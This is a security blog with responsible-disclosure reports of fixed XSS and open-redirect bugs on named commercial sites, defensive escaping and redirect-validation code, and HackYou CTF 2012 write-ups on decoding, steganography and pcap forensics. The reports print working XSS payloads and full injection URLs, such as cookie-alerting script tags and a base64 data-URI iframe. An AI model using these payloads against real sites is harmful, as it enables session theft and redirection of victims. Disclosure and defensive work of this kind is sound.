CTF "R" Us
Monday, 14 January 2013
[ Resolved XSS on Autodesk.com ]
This is a reported "Reflected XSS" found on autodesk.com, which I reported responsibly on 30/06/2012; they fixed it silently without replying.
Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path: /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=
Issue detail:
What I did was enter the XSS vector below in the search field.
</script><script>alert(document.cookie)</script>
The final URL looks like this:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0
This is the screenshot after I sent the payload.
Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it
[ Resolved Open Redirect on tradera.com ]
This is a reported "Open Redirect" bug found on tradera.com, which I reported responsibly on 20/06/2012, and eBay have fixed it.
Severity: URL Redirection
Confidence: Certain
Host: http://zandra.tradera.com/
Path: /event/uoqru/tradera.content.ros/2381283037/click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880
Issue detail:
The link was found on the main page of tradera.com.
If I were to replace "click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880" with "http://www.ebay.de" (without the quotes), I would be redirected to ebay.de instead.
If attackers were to send this link to innocent victims, they might be redirected to another, malicious website instead of ebay.de as in the example above.
Reported by: Jacob Soo
Vendor Notification: June 20, 2012
Resolution: October 27, 2012
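The fix for a redirector like the click?url= endpoint above is an allow-list on the target host rather than a blacklist of bad ones. The following is an added example, not code from the post or from tradera.com; the allowed host names and the fallback page are assumptions:

```python
from urllib.parse import urlsplit

# Assumption: the hosts this click-tracking redirector is allowed to send users to.
ALLOWED_HOSTS = {'tradera.com', 'www.tradera.com'}
FALLBACK = 'http://www.tradera.com/'


def safe_redirect_target(url, allowed=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return url if it is a same-site target, otherwise the fallback.

    Accepts absolute http(s) URLs whose host is on the allow-list and plain
    site-relative paths. Everything else falls back to the home page: other
    hosts, userinfo tricks such as http://www.tradera.com@other.example/,
    scheme-relative //host URLs, non-http schemes and backslash variants.
    """
    url = url.strip()
    if '\\' in url:
        return fallback              # browsers treat \ like /, so /\host would escape the site
    parts = urlsplit(url)
    if parts.scheme == '' and parts.netloc == '':
        # Relative target: must be an absolute path and must not start with //
        if url.startswith('/') and not url.startswith('//'):
            return url
        return fallback
    if parts.scheme not in ('http', 'https'):
        return fallback
    host = (parts.hostname or '').lower()   # hostname drops userinfo and port
    if host not in allowed:
        return fallback
    return url


if __name__ == '__main__':
    for candidate in ('http://www.tradera.com/auktion/1', 'http://www.ebay.de', '//www.ebay.de/'):
        print(candidate, '->', safe_redirect_target(candidate))
```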
[ Resolved Self-XSS on Zagat.com ]
This is a reported "Self XSS" on zagat.com, which I reported responsibly on 19/05/2012, and Google fixed it within days.
Severity: Self-XSS
Confidence: Certain
Host: http://www.zagat.com
Path: GET /search/location
Issue detail:
The XSS vector in my example is
"><img src=x onerror=prompt(1);>
I submitted it in the middle of the value of the "location" field. In this case I took "annandale, va" for my example.
This input was echoed as
annan"><img src=x onerror=prompt(1);>+dale%2C+va
in the application's response.
This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the PoC shows how I made use of a dynamically evaluated expression to introduce arbitrary JavaScript into the document.
Note that this technique works on all the browsers I currently have installed.
This is the screenshot after I sent the payload.
Reported by: Jacob Soo
Vendor Notification: May 19, 2012
Resolution: May 24, 2012
[ Resolved XSS on Monster.com ]
This is a reported "Reflected XSS" on monster.com, which I reported responsibly on 28/06/2012; monster.com silently fixed it without replying back to me. Life is such.
Severity: Reflected XSS
Confidence: Certain
Host: http://jobsearch.monster.com/
Path: /search/
Issue detail:
What I did was enter the XSS vector below in the search fields.
"><img src=x onerror=prompt(document.cookie);>
You will end up with something like the following:
http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E
This is the screenshot after I sent the payload.
Reported by: Jacob Soo
Vendor Notification: June 28, 2012
Resolution: July 2012
[ Resolved XSS on Apple.com ]
This is a reported "Reflected XSS" on apple.com, which I reported responsibly on 04/08/2012.
I'll be blogging about some web bugs which I've reported and which have been fixed. :D
Severity: Reflected XSS
Confidence: Certain
Host: http://www.apple.com/recycling/ipod-cell-phone/
Path: /
Issue detail:
What I did was pop up an alert using the payload below, which is just a base64-encoded page that runs alert(document.cookie).
"<iframe src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>
This is the screenshot before I sent my payload.
This is the screenshot after I sent the payload.
Reported by: Jacob Soo
Vendor Notification: August 04, 2012
Resolution: September 26, 2012
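All four XSS reports on this page share one root cause: the search term is copied into the response without encoding for the context it lands in (page body for the Monster and Apple payloads, a quoted attribute for Zagat, an inline script for Autodesk). The following is an added example, not code from the post or from any of the sites named, using constructed templates to show each reflection beside its hardened form:

```python
import html
import json

# The three payloads reported above, used here only as test inputs.
ATTRIBUTE_PAYLOAD = '"><img src=x onerror=prompt(1);>'
SCRIPT_PAYLOAD = '</script><script>alert(document.cookie)</script>'
BODY_PAYLOAD = ('"<iframe src="data:text/html;base64,'
                'PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>')


def reflect_in_body_unsafe(term):
    """Vulnerable pattern: the search term is pasted into the page body as-is."""
    return '<h1>Results for %s</h1>' % term


def reflect_in_body_safe(term):
    """Hardened: encode &, < and > so the term is rendered as text, not parsed as tags."""
    return '<h1>Results for %s</h1>' % html.escape(term)


def reflect_in_attribute_unsafe(term):
    """Vulnerable pattern: the term is pasted into a quoted attribute (the Zagat case)."""
    return '<input name="location" value="%s">' % term


def reflect_in_attribute_safe(term):
    """Hardened: encode quotes as well, so the term cannot close the attribute early."""
    return '<input name="location" value="%s">' % html.escape(term, quote=True)


def reflect_in_script_unsafe(term):
    """Vulnerable pattern: the term is pasted into an inline script string (the Autodesk case)."""
    return '<script>var qt = "%s";</script>' % term


def reflect_in_script_safe(term):
    """Hardened: emit a JSON string literal and rewrite "</" as "<\\/" so the HTML
    tokenizer never sees a closing script tag inside it. html.escape() is the wrong
    tool here: inside a script block the browser does not decode entities."""
    literal = json.dumps(term).replace('</', '<\\/')
    return '<script>var qt = %s;</script>' % literal


def script_value_roundtrip(term):
    """What the JS engine reads back from the hardened literal: the original term, intact."""
    markup = reflect_in_script_safe(term)
    return json.loads(markup[len('<script>var qt = '):-len(';</script>')])


def tag_count(markup):
    """Rough count of tags the tokenizer would start in text/attribute context."""
    return markup.count('<')


def script_end_tags(markup):
    """How many times the tokenizer would leave script data ("</script" ends it)."""
    return markup.lower().count('</script')
```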
Friday, 19 October 2012
[ HackYou CTF 2012 : Secure&Safe - Halloween ]
For this particular challenge, I am given this image below.
It reminded me of an old challenge used in one of the Korean CTFs, where I just filled the black colour with another colour. Immediately, I used MS Paint (yeah, as I am a poor chap :( ) and filled the black area with white, and I got back the following image.
Hmmm... what are the dots representing? After analysing for some time, my gut feeling tells me that it's neither Morse code nor Braille. Two dots could represent 1 and one dot 0, like binary.
But wait a minute, there are only 7 of them for each character? Well, it could be 7-bit ASCII.
1100001 1101001 1101110 1110100 1011111 1100001
1100110 1110010 1100001 1101001 1100100 1011111 1101111 1100110 1011111 1101110
1101111 1011111 1100111 1101000 1101111 1110011 1110100 1110011
So I developed a Python script just to decode this.
# The 7-bit groups read off the image, one per character, in order
BITS = """
1100001 1101001 1101110 1110100 1011111 1100001
1100110 1110010 1100001 1101001 1100100 1011111 1101111 1100110 1011111 1101110
1101111 1011111 1100111 1101000 1101111 1110011 1110100 1110011
"""

# Parse each group as base 2 and map the resulting ASCII code to its character
string = "".join(chr(int(group, 2)) for group in BITS.split())
print("%s\n" % string)
The result from this Python script is "aint_afraid_of_no_ghosts" and that is the key to this challenge.
Cheers,
Jacob Soo
[ HackYou CTF 2012 : Secure&Safe - Perfect Concealment ]
I don't have the direct link to the .txt file, but inside the .txt file you will see this.
The giant panda (Ailuropoda melanoleuca, meaning "black and white cat-foot") is a type of bear. It lives in bamboo forests in central China. The giant panda is an endangered animal. In November 2007, China had 239 giant pandas who lived in captivity. There are 27 giant pandas which live in zoos outside of China. The exact number of giant pandas in the wild is not known. Some sources say there are about 1,590, other sources give a number between 2,000 and 3,000. The number of giant pandas in the wild seems to be increasing.
Giant pandas are about 1.2–1.5 m long and about 75 cm high. They weigh between 75 and 160 kg. Giant pandas have white fur on their bodies and black fur on their legs and shoulders. They also have black ears and black patches around their eyes. Pandas can climb and swim well.
Giant pandas are born with pink skin, with black areas on the legs, ears, and eyes. They are usually born with a small amount of white fur. They get more fur when they are about nine months old.
Giant pandas live alone. Females have a territory which they deFend against other females. When female pandas are ready to mate, they give off a special scent and make a loud bLeating noise to tell the males that they are ready. Giant pandAs mate between the months of March and May which is the Summer months in China. If there are several males, they fight each other. The one who wins – the stronGest male, then mates with the female. In August or September, the female gIves birth to one or two babies. If she has two babies, she will only raise one baby, and the other baby dies, no-one really knows how the female panda chooSe between the two. Giant panda babies are very small, and weigh only 90–130 grams, which is about 1/900 of its mother's weight. The baby drinks milk until it is 8–9 months old. Young pandas live with their mothers until they are 18–24 months old. They become mature when they are 5–7 years old. They live around 20 years in the wild and up to 30 years in captivity (e.g. in zoos). Unlike other bears, pandas do not hibernate.
Today, the giant panda is seen as a symbol for China. It is also protected by the ChineSe government, and killing a panda is a crime. ThE giant panda is now under the threat of eXtinction, and it will die out if the forests of bamboo continue to disappear.
People outside of eastern Asia did not know about the giant panda until 1869. The first "Westerner" to see a live panda was a German zoologist in 1916. In 1936, Ruth Harkness became the first Westerner to bring a live giant panda out of China. It was a cub (babY panda) named Su-Lin. The cub was taken to live at the Brookfield Zoo in Chicago.
In the 1970s, China began showing giant pandaS in zoos in the UniTed States and Japan as a type of diplomacy. This happened until 1984, when China changEd how this was done. Starting in 1984, China would allow zoos to keep the giant pandas for 10 years, but the zoo would have to pay China up to $1,000,000 each year. Also, the zoo would have to aGree that any cubs born would belong to China.
Although their bodies are made to eat meat, giant pandas are mostly herbivOrous. Their main source of food is bamboo. Because pandas have the digestive system of carnivores and can not digest cellulose very well, they get little energy and protein from the bamboo they eat. Because they get very little nutrition from bamboo, they must eat a lot. Pandas commonly eat 20 to 30 pounds of bamboo a day to get the nutrition they need. Although there are more than 200 different varieties of bamboo the Panda will only eat 20 varieties. Pandas sometimes run out of food, as a tyPe of bamboo flowers, die, and regrow again at the same time.
As of 2008, the giant bear is an endangered animal. The main problem they have is habitat loss. Habitat loss is when the places they live in are ruined. Humans often ruin the places where pandas live, such as for the construction of buildings. Pandas cAn also lose their habitat because of pollution. Pollution means that less bamboo grows, or that bamboo stops growing completely in a certain place. Giant pandas also have a low birth rate, which makes the problem worse.
TraditioNal Chinese stories about the giant pandas say that the animal can be very powerful. Some people believe that sleeping on a panda skin can protect them from ghost and predict their future. These tales are one of the reasons why people would spend lots of money for the skin and fur of this precious animal.
In former times, the panDas were also hunted. The Western people who came to China were soon unable to hunt the pandas, because of different wars. Local people continued though. PandAs were mainly hunted for their fur. Today, hunting pandas is not allowed.
In 1963, China set up a nature reserve for pandas, the Wolong National Nature Reserve. This was the firSt, other nature reserves followed. China did this to fight the number of pandas going down. In 2006, there were 40 panda reserves, compared to 13, two decades ago.
After looking through it for a while, I can see that some words have capital letters in the middle of the word.
Probably those capital letters are what we are looking for.
Using the Python script I've developed, we can see what the special capital letters form.
import re

# Read the file into a string
with open('stg100.txt', 'r') as f:
    text = f.read()

# Capture a capital letter that follows at least one other word character,
# i.e. a capital in the middle or at the end of a word
key = re.findall(r'\w\w*([A-Z])\w*', text)
print("%s\n" % key)
The output from my script is:
['F', 'L', 'A', 'G', 'I', 'S', 'S', 'E', 'X', 'Y', 'S', 'T', 'E', 'G', 'O', 'P', 'A', 'N', 'D', 'A', 'S']
The key to this challenge is "SEXYSTEGOPANDAS"
Cheers,
Jacob Soo
[ HackYou CTF 2012 : Wikitap - Oscaderp Forensic ]
I'm only given the following as a hint.
What's the md5 of the file being transferred?
Downloading the link that was given to me and checking it, it's another PCAP file.
OK, let's load it up in Wireshark and analyse it.
After analysing it, it looks like an FTP session.
In Wireshark there is a filter, "ftp-data", for all the data that is being transferred.
So let's use that filter, and we get something like the image shown below.
The important FTP data packets are the last 3 in the image, which carry tcp_serv.beam.
So we do a Right-Click -> "Follow TCP Stream" to retrieve the file.
Then do a "Save As" to save the file. Now just use md5sum or any of your favourite md5 tools to check the md5 of the file which we just saved.
We will get "77f92edb199815b17e2ff8da36e200df", which is the key to this challenge. :P
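"Follow TCP Stream" does more than glue the ftp-data packets together: it orders them by sequence number and discards retransmitted bytes, and the md5 is only right for that reassembled stream. As an added example that is not part of the post, the same reassembly in Python over a constructed capture (a stand-in byte string, not the real tcp_serv.beam):

```python
import hashlib
import random


def reassemble_stream(segments):
    """Rebuild one direction of a TCP stream from (seq, payload) pairs.

    Bytes are placed by sequence number, so out-of-order arrival and
    retransmissions do not corrupt the result. Returns None if the capture
    has a hole. Assumption (constructed example): no 32-bit sequence wrap.
    """
    if not segments:
        return b''
    base = min(seq for seq, _ in segments)
    end = max(seq + len(p) for seq, p in segments)
    data = bytearray(end - base)
    seen = bytearray(end - base)            # coverage map: 1 where a byte was captured
    for seq, payload in sorted(segments):
        off = seq - base
        data[off:off + len(payload)] = payload
        seen[off:off + len(payload)] = b'\x01' * len(payload)
    if 0 in seen:
        return None                         # missing segment: an md5 would be meaningless
    return bytes(data)


def md5_of_stream(segments):
    """Hex md5 of the reassembled ftp-data stream, or None if it is incomplete."""
    data = reassemble_stream(segments)
    return None if data is None else hashlib.md5(data).hexdigest()


def naive_concat(segments):
    """What you get by gluing payloads together in capture order (wrong on real captures)."""
    return b''.join(p for _, p in segments)


# Constructed stand-in for the transferred file (not the real tcp_serv.beam).
FILE = b'FOR1' + bytes(range(256)) * 4
EXPECTED_MD5 = hashlib.md5(FILE).hexdigest()

# Constructed capture: the file cut into 300-byte segments starting at seq 1000,
# one segment retransmitted, then shuffled to simulate out-of-order arrival.
SEGMENTS = []
_seq = 1000
for _i in range(0, len(FILE), 300):
    _chunk = FILE[_i:_i + 300]
    SEGMENTS.append((_seq, _chunk))
    _seq += len(_chunk)
SEGMENTS.append(SEGMENTS[1])                # retransmission of the second segment
random.Random(7).shuffle(SEGMENTS)

if __name__ == '__main__':
    print('reassembled md5:  ', md5_of_stream(SEGMENTS))
    print('capture-order md5:', hashlib.md5(naive_concat(SEGMENTS)).hexdigest())
```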
Cheers,
Jacob Soo
[ HackYou CTF 2012 : Wikitap - EpikArc ]
Initially, I thought this would be more of a forensics type of challenge. It turned out to be more network forensics.
Mister You is willing to hire someone who can repeat his investigation.
Arc starts from here
The above link will give you a PCAP file.
Find the secret link in this conversation.
After analysing the .pcap file for a while using Wireshark, it seems that the conversation is via HTTP POST.
So what I did was use the built-in filter in Wireshark to search for all the conversations in the .pcap file, like the image shown below.
Then we find the following message.
As we can see, the key to this particular challenge is "tinyurl.com/8pdox5a".
P.S.: Going to the above link will give us the file for the Mystery Challenge. :P
Cheers,
Jacob Soo
Thursday, 18 October 2012
[ HackYou CTF 2012 : Binary - Open-Source ]
Next up is Open-Source.
All I've got is an open-source C program that was given to me here.
The source code looks like this.
#include <stdio.h>
#include <stdlib.h>   /* atoi, exit */
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }
    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }
    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }
    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }
    printf("Brr wrrr grr\n");
    /* the key: only second % 17 and the length of argv[3] feed the hash */
    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}
Well, looking at the source code, we can deduce a few things.
first == 0xcafe == 51966
second == 25
argv[3] must be different from h4cky0u, but I believe the strlen should be the same.
Finally, the hash should be
hash = 51966 * 31337 + (25 % 17) * 11 + 7 - 1615810207
hash will eventually be 1628458637 - 1615810207 -> 12648430
As the result is printed in hexadecimal, the key is c0ffee
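As an added example (not the author's script), the same arithmetic in Python, mirroring the gates in the C source above and the 32-bit unsigned int wrap-around the hash would be subject to; it also shows that any second with second % 17 == 8 and second % 5 != 3 yields the same key, because only second % 17 feeds the hash:

```python
def passes_checks(first, second, third):
    """The three gates from the challenge source: the exact value of first, the two
    modulus tests on second, and strcmp("h4cky0u", argv[3]) returning 0."""
    return (first == 0xcafe
            and second % 5 != 3 and second % 17 == 8
            and third == 'h4cky0u')


def find_second(limit=1000):
    """Smallest non-negative value of second that passes both modulus tests."""
    for n in range(limit):
        if n % 5 != 3 and n % 17 == 8:
            return n
    return None


def open_source_key(first=0xcafe, second=25, third='h4cky0u'):
    """Reproduce the printed key. The C code computes the hash in an unsigned int,
    so the result is masked to 32 bits before being rendered as lowercase hex."""
    if not passes_checks(first, second, third):
        return None
    h = (first * 31337 + (second % 17) * 11 + len(third) - 1615810207) & 0xFFFFFFFF
    return '%x' % h


if __name__ == '__main__':
    print('smallest valid second:', find_second())
    print('key:', open_source_key())
```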
Cheers,
Jacob Soo